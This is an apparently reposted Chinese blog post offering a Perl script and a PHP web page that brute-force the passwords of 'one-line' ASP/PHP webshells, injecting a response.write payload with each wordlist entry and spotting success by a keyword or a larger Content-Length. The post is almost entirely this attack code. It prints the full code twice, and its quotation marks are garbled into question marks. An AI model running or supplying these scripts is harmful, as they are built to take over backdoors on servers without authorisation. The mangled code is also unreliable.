一句话木马破解很黄很暴力哦
2015-11-01 01:46
621 查看
ASP&PHP一句话木马密码破解的破解脚本,很黄很暴力.
#/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print ?=========================\n?;
print ?\n?;
print ?crack.pl Url\n?;
print ?\n?;
print ?crack.pl http://www.t00ls.in/1.asp\n?;
print ?\n?;
print ?Made By Cond0r QQ 84588307\n?;
print ?\n?;
print ?=========================\n?;
print ?\n?;
print ?Url Is :?;
$ul=<STDIN>;
chomp $ul;
open PASS,?pass.txt?;
$a=0;
foreach $pass (<PASS>)
{
@pass[$a]=$pass;
$a++;
$ua = new LWP::UserAgent;
$text=?\?QQ84588307\?";
$url=$ul.???.$pass.?=response.write(?.$text.?)?;
$req=new HTTP::Request(?GET?,$url);
print $rep;
$respond = $ua->request($req)->as_string;
print ?The Pass Is:?.$pass if($respond =~ /QQ84588307/);
}
破解PHP一句话密码 PHP版
<?php
/*
* Created on 2010-11-4
*/
set_time_limit(0);
$url = $_GET['url'];
$passfile = $_GET['upfile'];
$keyword = ?xxoo?; //关键字,改不改一样,因为判断的不是内容,而是http返回的内容长度
$c_l = get_headers($url,1); //获得正常http头的内容长度
$normal_c_l = $c_l['Content-Length'];
if($url && $passfile && $keyword) {
$fp = fopen($passfile,r);
while(!feof($fp)) {
$pass = trim(fgets($fp));
$all_url=$url.???.$pass.?=response.write(?.???.$keyword.??)?;
$head_msg = get_headers($all_url,1);
if($head_msg['Content-Length'] >$normal_c_l) { //内容长度大于正常的就是keyword写入了,密码就出来咯
echo ?<font color=red>破解成功,密码是:$pass</font>?;
exit();
}
}
fclose($fp);
}
?>
<html>
<head>
<title>asp一句话暴力破解</title>
</head>
<body>
<form action=? method=?get?>
<table>
<tr>
<td>一句话地址:</td>
<td><input type=?text? name=?url? value=?http://127.0.0.1:81/2.asp? /></td>
</tr>
<tr>
<td>密码文件:</td>
<td><input name=?upfile? type=?file?></td>
</tr>
</table>
<input type=?submit? name=?submit? value=?提交?/>
</form>
<p>说明:不是用获取页面内容,再判断关键字的方法。那样在一个大量数据的网页可能会很慢。</p>
<p>这里用的是判断http头的Content-Length的方法,如果密码匹配成功,则response.write就会成功,页面内容就比原来多了</p>
<p>思路就是这样!</p>
<p>php不能多线程,速度大概是1000个密码15-20秒</p>
<body>
</html>
#/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print ?=========================\n?;
print ?\n?;
print ?crack.pl Url\n?;
print ?\n?;
print ?crack.pl http://www.t00ls.in/1.asp\n?;
print ?\n?;
print ?Made By Cond0r QQ 84588307\n?;
print ?\n?;
print ?=========================\n?;
print ?\n?;
print ?Url Is :?;
$ul=<STDIN>;
chomp $ul;
open PASS,?pass.txt?;
$a=0;
foreach $pass (<PASS>)
{
@pass[$a]=$pass;
$a++;
$ua = new LWP::UserAgent;
$text=?\?QQ84588307\?";
$url=$ul.???.$pass.?=response.write(?.$text.?)?;
$req=new HTTP::Request(?GET?,$url);
print $rep;
$respond = $ua->request($req)->as_string;
print ?The Pass Is:?.$pass if($respond =~ /QQ84588307/);
}
破解PHP一句话密码 PHP版
<?php
/*
* Created on 2010-11-4
*/
set_time_limit(0);
$url = $_GET['url'];
$passfile = $_GET['upfile'];
$keyword = ?xxoo?; //关键字,改不改一样,因为判断的不是内容,而是http返回的内容长度
$c_l = get_headers($url,1); //获得正常http头的内容长度
$normal_c_l = $c_l['Content-Length'];
if($url && $passfile && $keyword) {
$fp = fopen($passfile,r);
while(!feof($fp)) {
$pass = trim(fgets($fp));
$all_url=$url.???.$pass.?=response.write(?.???.$keyword.??)?;
$head_msg = get_headers($all_url,1);
if($head_msg['Content-Length'] >$normal_c_l) { //内容长度大于正常的就是keyword写入了,密码就出来咯
echo ?<font color=red>破解成功,密码是:$pass</font>?;
exit();
}
}
fclose($fp);
}
?>
<html>
<head>
<title>asp一句话暴力破解</title>
</head>
<body>
<form action=? method=?get?>
<table>
<tr>
<td>一句话地址:</td>
<td><input type=?text? name=?url? value=?http://127.0.0.1:81/2.asp? /></td>
</tr>
<tr>
<td>密码文件:</td>
<td><input name=?upfile? type=?file?></td>
</tr>
</table>
<input type=?submit? name=?submit? value=?提交?/>
</form>
<p>说明:不是用获取页面内容,再判断关键字的方法。那样在一个大量数据的网页可能会很慢。</p>
<p>这里用的是判断http头的Content-Length的方法,如果密码匹配成功,则response.write就会成功,页面内容就比原来多了</p>
<p>思路就是这样!</p>
<p>php不能多线程,速度大概是1000个密码15-20秒</p>
<body>
</html>
相关文章推荐
- 进入dos的一个密码破解方法
- php错误提示failed to open stream: HTTP request failed!的完美解决方法
- 小论asp中request与response的用法
- 循环取值Request.QueryString的用法
- request.getParameter()取值为null的解决方法
- Asp.net内置对象之Request对象(概述及应用)
- 通过过滤器(Filter)解决JSP的Post和Request中文乱码问题
- asp下request.querystring("id")与request("id")区别
- 关于request.getHeader("Referer")的问题探讨
- asp.net Request.ServerVariables[] 读解
- Request.UrlReferrer使用详解
- php中使用$_REQUEST需要注意的一个问题
- 跟我学Laravel之请求(Request)的生命周期
- php中神奇的fastcgi_finish_request
- JSP用过滤器解决request getParameter中文乱码问题
- 详解Django中Request对象的相关用法
- 解决IIS8.5中ASP上传大文件出现 Request 对象 错误 ASP 0104 : 80004005 错误的方法
- nginx服务器access日志中大量400 bad request错误的解决方法
- Nginx HTTP:413 Request Entity Too Large解决方法
- Python脚本暴力破解栅栏密码